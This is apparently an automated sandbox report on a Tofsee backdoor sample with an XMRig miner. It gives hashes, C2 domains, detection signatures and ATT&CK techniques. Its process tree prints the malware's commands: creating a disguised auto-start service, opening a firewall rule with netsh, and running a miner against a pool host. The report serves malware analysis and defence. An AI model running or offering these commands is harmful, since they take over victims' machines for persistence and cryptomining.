Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    11-12-2021 08:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe

  • Size

    209KB

  • MD5

    cb2412d7c6cd6d8b942361f482655a4b

  • SHA1

    ce43dc2225354f5536b795ae307f1a7381c2e566

  • SHA256

    8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801

  • SHA512

    67332318a7eee352b1fe4fbe8455ac2841b233257103391b72fa6859affc724e9f8c508c055780e68c681567e74e104c572f2b90240c84000793a2c9f0244305

Score
10/10
tofseexmrigevasionminerpersistencesuricatatrojan

Malware Config

Extracted

Family

tofsee

C2

mubrikych.top

oxxyfix.xyz

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • suricata: ET MALWARE Win32/Tofsee Connectivity Check M2

    suricata: ET MALWARE Win32/Tofsee Connectivity Check M2

    suricata
  • suricata: ET MALWARE Win32/Tofsee Connectivity Check M3

    suricata: ET MALWARE Win32/Tofsee Connectivity Check M3

    suricata
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 3 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe
    "C:\Users\Admin\AppData\Local\Temp\8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:400
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mflygwrk\
      2⤵
        PID:3684
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wxxbyhzq.exe" C:\Windows\SysWOW64\mflygwrk\
        2⤵
          PID:360
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create mflygwrk binPath= "C:\Windows\SysWOW64\mflygwrk\wxxbyhzq.exe /d\"C:\Users\Admin\AppData\Local\Temp\8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2192
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description mflygwrk "wifi internet conection"
            2⤵
              PID:596
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start mflygwrk
              2⤵
                PID:3400
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:324
              • C:\Windows\SysWOW64\mflygwrk\wxxbyhzq.exe
                C:\Windows\SysWOW64\mflygwrk\wxxbyhzq.exe /d"C:\Users\Admin\AppData\Local\Temp\8450ef674fd0c90136e6cdd810d510ade0cbb8d60b4a47ed563d3c9a0a14a801.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3356
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:1428
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1548

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Initial Access

              Execution

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Credential Access

              Discovery

              System Information Discovery

              1
              T1082

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\wxxbyhzq.exe
                MD5

                4ac8bab1568c5b71fa307242f0240773

                SHA1

                316bc8b3204e3183b04916567952096ea879346c

                SHA256

                b4346ad490192632319eb83559f159e180c17834e1e966352efcdd9ff98fe44b

                SHA512

                7811200b349084fd1125f37edc6399152e897609769c64dfba1c578a41f867b567cadd2e72245b9415d2cb5419a5ddd1db09a75df9ac8c31daf16c7f9d99edac

                Download Submit
              • C:\Windows\SysWOW64\mflygwrk\wxxbyhzq.exe
                MD5

                4ac8bab1568c5b71fa307242f0240773

                SHA1

                316bc8b3204e3183b04916567952096ea879346c

                SHA256

                b4346ad490192632319eb83559f159e180c17834e1e966352efcdd9ff98fe44b

                SHA512

                7811200b349084fd1125f37edc6399152e897609769c64dfba1c578a41f867b567cadd2e72245b9415d2cb5419a5ddd1db09a75df9ac8c31daf16c7f9d99edac

                Download Submit
              • memory/324-125-0x0000000000000000-mapping.dmp
                Download
              • memory/360-119-0x0000000000000000-mapping.dmp
                Download
              • memory/400-116-0x00000000001D0000-0x00000000001E3000-memory.dmp
                Filesize

                76KB

                Download
              • memory/400-117-0x0000000000400000-0x0000000000825000-memory.dmp
                Filesize

                4.1MB

                Download
              • memory/400-115-0x00000000001C0000-0x00000000001CD000-memory.dmp
                Filesize

                52KB

                Download
              • memory/596-122-0x0000000000000000-mapping.dmp
                Download
              • memory/1428-126-0x0000000002900000-0x0000000002915000-memory.dmp
                Filesize

                84KB

                Download
              • memory/1428-127-0x0000000002909A6B-mapping.dmp
                Download
              • memory/1428-128-0x0000000000800000-0x0000000000801000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1428-129-0x0000000000800000-0x0000000000801000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1428-131-0x0000000002900000-0x0000000002915000-memory.dmp
                Filesize

                84KB

                Download
              • memory/1548-132-0x0000000002890000-0x0000000002981000-memory.dmp
                Filesize

                964KB

                Download
              • memory/1548-136-0x000000000292259C-mapping.dmp
                Download
              • memory/1548-137-0x0000000002890000-0x0000000002981000-memory.dmp
                Filesize

                964KB

                Download
              • memory/2192-121-0x0000000000000000-mapping.dmp
                Download
              • memory/3356-130-0x0000000000400000-0x0000000000825000-memory.dmp
                Filesize

                4.1MB

                Download
              • memory/3400-123-0x0000000000000000-mapping.dmp
                Download
              • memory/3684-118-0x0000000000000000-mapping.dmp
                Download